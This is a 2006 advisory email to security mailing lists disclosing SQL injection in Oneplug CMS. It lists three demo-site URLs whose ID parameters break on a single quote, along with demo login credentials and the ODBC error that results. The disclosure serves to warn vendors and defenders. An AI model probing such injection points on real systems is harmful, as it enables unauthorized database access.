From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Thu, 05 Jan 2006 18:28:08 -0500
Subject: [OSVDB Mods] Oneplug CMS - SQL Injecton

Oneplug CMS - SQL Injecton

Vendor URL: http://oneplug.com

PoC:

Login:

Username: demo
Pass: demo

Sql Injection:

http://demo.oneplug.com/press/details.asp?Press_Release_ID='
http://demo.oneplug.com/services/details.asp?Service_ID='
http://demo.oneplug.com/products/details.asp?Product_ID='

Result:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'Service_ID = ' AND Session_ID = 209'.

/services/details.asp, line 15


Preddy
RootShell Security Group